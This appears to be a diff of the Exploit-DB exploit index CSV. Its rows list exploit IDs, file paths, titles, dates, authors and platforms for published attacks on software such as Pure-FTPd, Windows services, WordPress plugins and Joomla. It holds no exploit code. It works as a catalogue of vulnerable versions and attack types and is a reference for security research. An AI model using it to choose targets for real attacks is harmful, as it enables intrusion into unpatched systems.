49105,exploits/multiple/dos/49105.py,"Pure-FTPd 1.0.48 - Remote Denial of Service",2020-11-26,xynmaps,dos,multiple,
49119,exploits/linux/dos/49119.py,"libupnp 1.6.18 - Stack-based buffer overflow (DoS)",2020-11-27,"Patrik Lantz",dos,linux,
49206,exploits/windows/dos/49206.txt,"TapinRadio 2.13.7 - Denial of Service (PoC)",2020-12-07,"Ismael Nava",dos,windows,
49207,exploits/windows/dos/49207.txt,"RarmaRadio 2.72.5 - Denial of Service (PoC)",2020-12-07,"Ismael Nava",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10416,6 +10418,7 @@ id,file,description,date,author,type,platform,port
49012,exploits/windows/local/49012.txt,"Motorola Device Manager 2.5.4 - 'MotoHelperService.exe' Unquoted Service Path",2020-11-09,"Angel Canseco",local,windows,
49013,exploits/windows/local/49013.txt,"Motorola Device Manager 2.5.4 - 'ForwardDaemon.exe ' Unquoted Service Path",2020-11-09,"Angel Canseco",local,windows,
49014,exploits/windows/local/49014.txt,"Realtek Andrea RT Filters 1.0.64.10 - 'AERTSr64.EXE' Unquoted Service Path",2020-11-09,"Erika Figueroa",local,windows,
49015,exploits/windows/local/49015.txt,"Realtek Audio Service 1.0.0.55 - 'RtkAudioService64.exe' Unquoted Service Path",2020-11-09,"Erika Figueroa",local,windows,
49016,exploits/windows/local/49016.txt,"MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
49017,exploits/windows/local/49017.txt,"Magic Mouse 2 utilities 2.20 - 'magicmouse2service' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
49018,exploits/windows/local/49018.txt,"iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path",2020-11-09,"Leslie Lara",local,windows,
@ -11218,9 +11221,13 @@ id,file,description,date,author,type,platform,port
49144,exploits/windows/local/49144.bat,"Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path",2020-12-01,"Metin Yunus Kandemir",local,windows,
49147,exploits/windows/local/49147.txt,"aSc TimeTables 2021.6.2 - Denial of Service (PoC)",2020-12-02,"Ismael Nava",local,windows,
49157,exploits/windows/local/49157.txt,"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path",2020-12-02,"Manuel Alvarez",local,windows,
49158,exploits/windows/local/49158.txt,"Realtek Andrea RT Filters 1.0.64.7 - 'AERTSr64.EXE' Unquoted Service Path",2020-12-02,"Manuel Alvarez",local,windows,
49179,exploits/windows/local/49179.cpp,"Microsoft Windows - Win32k Elevation of Privilege",2020-12-02,nu11secur1ty,local,windows,
49191,exploits/windows/local/49191.txt,"IDT PC Audio 1.0.6499.0 - 'STacSV' Unquoted Service Path",2020-12-04,"Diego Cañada",local,windows,
49195,exploits/multiple/local/49195.js,"Chromium 83 - Full CSP Bypass",2020-12-04,"Gal Weizman",local,multiple,
49203,exploits/windows/local/49203.txt,"Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path",2020-12-07,"Mohammed Alshehri",local,windows,
49205,exploits/windows/local/49205.txt,"Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path",2020-12-07,"Ismael Nava",local,windows,
49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17886,6 +17893,7 @@ id,file,description,date,author,type,platform,port
42787,exploits/hardware/remote/42787.txt,"FLIR Thermal Camera F/FC/PT/D - SSH Backdoor Access",2017-09-25,LiquidWorm,remote,hardware,
42790,exploits/linux/remote/42790.txt,"Tiny HTTPd 0.1.0 - Directory Traversal",2017-09-26,"Touhid M.Shaikh",remote,linux,
42793,exploits/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,remote,multiple,5858
49210,exploits/windows/remote/49210.py,"Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow",2020-12-07,0rbz_,remote,windows,
48816,exploits/windows/remote/48816.py,"Microsoft SQL Server Reporting Services 2016 - Remote Code Execution",2020-09-17,"West Shepherd",remote,windows,
48842,exploits/hardware/remote/48842.py,"Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow",2020-10-01,LiquidWorm,remote,hardware,
48954,exploits/hardware/remote/48954.txt,"Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root",2020-10-27,LiquidWorm,remote,hardware,
@ -38777,7 +38785,7 @@ id,file,description,date,author,type,platform,port
39030,exploits/php/webapps/39030.txt,"BloofoxCMS - '/bloofox/admin/index.php?Username' SQL Injection",2014-01-17,AtT4CKxT3rR0r1ST,webapps,php,
39031,exploits/php/webapps/39031.html,"BloofoxCMS - '/admin/index.php' Cross-Site Request Forgery (Add Admin)",2014-01-17,AtT4CKxT3rR0r1ST,webapps,php,
39032,exploits/php/webapps/39032.txt,"BloofoxCMS 0.5.0 - 'fileurl' Local File Inclusion",2014-01-17,AtT4CKxT3rR0r1ST,webapps,php,
39033,exploits/php/webapps/39033.py,"Joomla! 1.5 < 3.4.5 - Object Injection 'x-forwarded-for' Header Remote Code Execution",2015-12-18,"Andrew McNicol",webapps,php,80
39033,exploits/php/webapps/39033.py,"Joomla! 1.5 < 3.4.6 - Object Injection 'x-forwarded-for' Header Remote Code Execution",2015-12-18,"Andrew McNicol",webapps,php,80
39034,exploits/php/webapps/39034.html,"Ovidentia maillist Module 4.0 - Remote File Inclusion",2015-12-18,bd0rk,webapps,php,80
39099,exploits/php/webapps/39099.txt,"Rhino - Cross-Site Scripting / Password Reset",2014-02-12,Slotleet,webapps,php,
39038,exploits/php/webapps/39038.txt,"pfSense 2.2.5 - Directory Traversal",2015-12-18,R-73eN,webapps,php,
@ -43199,6 +43207,7 @@ id,file,description,date,author,type,platform,port
48611,exploits/multiple/webapps/48611.txt,"WebPort 1.19.1 - Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple,
48612,exploits/php/webapps/48612.txt,"WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,php,
48642,exploits/linux/webapps/48642.sh,"BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution",2020-07-06,"Critical Start",webapps,linux,
48614,exploits/hardware/webapps/48614.txt,"Eaton Intelligent Power Manager 1.6 - Directory Traversal",2020-06-22,"Emre ÖVÜNÇ",webapps,hardware,
48615,exploits/php/webapps/48615.txt,"Responsive Online Blog 1.0 - 'id' SQL Injection",2020-06-23,"Eren Şimşek",webapps,php,
48616,exploits/php/webapps/48616.txt,"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)",2020-06-23,BKpatron,webapps,php,
48619,exploits/multiple/webapps/48619.txt,"BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting",2020-06-24,"William Summerhill",webapps,multiple,
@ -43255,6 +43264,7 @@ id,file,description,date,author,type,platform,port
48694,exploits/hardware/webapps/48694.txt,"UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin)",2020-07-26,LiquidWorm,webapps,hardware,
48698,exploits/php/webapps/48698.txt,"WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download",2020-07-26,KBA@SOGETI_ESEC,webapps,php,
48699,exploits/php/webapps/48699.sh,"WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)",2020-07-26,KBA@SOGETI_ESEC,webapps,php,
48700,exploits/php/webapps/48700.txt,"PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting",2020-07-26,"Emre ÖVÜNÇ",webapps,php,
48701,exploits/multiple/webapps/48701.txt,"Bludit 3.9.2 - Directory Traversal",2020-07-26,"James Green",webapps,multiple,
48702,exploits/php/webapps/48702.txt,"LibreHealth 2.0.0 - Authenticated Remote Code Execution",2020-07-26,boku,webapps,php,
48704,exploits/php/webapps/48704.py,"Online Course Registration 1.0 - Unauthenticated Remote Code Execution",2020-07-26,boku,webapps,php,
@ -43324,6 +43334,7 @@ id,file,description,date,author,type,platform,port
48787,exploits/php/webapps/48787.txt,"Daily Tracker System 1.0 - Authentication Bypass",2020-09-03,"Adeeb Shah",webapps,php,
48788,exploits/php/webapps/48788.txt,"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)",2020-09-03,V1n1v131r4,webapps,php,
49063,exploits/php/webapps/49063.txt,"Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php,
49064,exploits/php/webapps/49064.txt,"Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities",2020-11-17,Vulnerability-Lab,webapps,php,
49069,exploits/php/webapps/49069.txt,"Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting (Authenticated)",2020-11-18,ZwX,webapps,php,
49070,exploits/multiple/webapps/49070.txt,"BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery",2020-11-18,"RedTeam Pentesting GmbH",webapps,multiple,
49072,exploits/multiple/webapps/49072.txt,"PESCMS TEAM 2.3.2 - Multiple Reflected XSS",2020-11-19,icekam,webapps,multiple,
@ -43391,6 +43402,7 @@ id,file,description,date,author,type,platform,port
49162,exploits/multiple/webapps/49162.txt,"Online News Portal System 1.0 - 'Title' Stored Cross Site Scripting",2020-12-02,"Parshwa Bhavsar",webapps,multiple,
49163,exploits/multiple/webapps/49163.txt,"Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass",2020-12-02,"Aditya Wakhlu",webapps,multiple,
49164,exploits/php/webapps/49164.txt,"WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting",2020-12-02,"Hemant Patidar",webapps,php,
49165,exploits/multiple/webapps/49165.txt,"Employee Record Management System 1.1 - Login Bypass SQL Injection",2020-12-02,"Anurag Kumar",webapps,multiple,
49166,exploits/multiple/webapps/49166.txt,"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Add Artwork",2020-12-02,"Shahrukh Iqbal Mirza",webapps,multiple,
49167,exploits/multiple/webapps/49167.txt,"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile",2020-12-02,"Shahrukh Iqbal Mirza",webapps,multiple,
49168,exploits/multiple/webapps/49168.txt,"DotCMS 20.11 - Stored Cross-Site Scripting",2020-12-02,"Hardik Solanki",webapps,multiple,
@ -43402,6 +43414,7 @@ id,file,description,date,author,type,platform,port
49175,exploits/php/webapps/49175.txt,"Simple College Website 1.0 - 'page' Local File Inclusion",2020-12-02,Mosaaed,webapps,php,
49177,exploits/php/webapps/49177.txt,"Car Rental Management System 1.0 - SQL Injection / Local File include",2020-12-02,Mosaaed,webapps,php,
49178,exploits/php/webapps/49178.bash,"WordPress Plugin Wp-FileManager 6.8 - RCE",2020-12-02,"Mansoor R",webapps,php,
49180,exploits/php/webapps/49180.txt,"User Registration & Login and User Management System 2.1 - Cross Site Request Forgery",2020-12-03,"Dipak Panchal",webapps,php,
49181,exploits/php/webapps/49181.txt,"Coastercms 5.8.18 - Stored XSS",2020-12-03,"Hardik Solanki",webapps,php,
49182,exploits/multiple/webapps/49182.txt,"EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass",2020-12-03,"Mayur Parmar",webapps,multiple,
49184,exploits/multiple/webapps/49184.txt,"mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting",2020-12-03,"Sagar Banwa",webapps,multiple,
@ -43418,3 +43431,6 @@ id,file,description,date,author,type,platform,port
49198,exploits/php/webapps/49198.txt,"Laravel Nova 3.7.0 - 'range' DoS",2020-12-04,iqzer0,webapps,php,
49199,exploits/php/webapps/49199.txt,"CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)",2020-12-04,"Eshan Singh",webapps,php,
49202,exploits/php/webapps/49202.txt,"Zabbix 5.0.0 - Stored XSS via URL Widget Iframe",2020-12-04,"Shwetabh Vishnoi",webapps,php,
49204,exploits/php/webapps/49204.txt,"Cyber Cafe Management System Project (CCMS) 1.0 - Persistent Cross-Site Scripting",2020-12-07,"Pruthvi Nekkanti",webapps,php,
49208,exploits/php/webapps/49208.txt,"Savsoft Quiz 5 - 'Skype ID' Stored XSS",2020-12-07,"Dipak Panchal",webapps,php,
49209,exploits/php/webapps/49209.txt,"vBulletin 5.6.3 - 'group' Cross Site Scripting",2020-12-07,Vincent666,webapps,php,

Can't render this file because it is too large.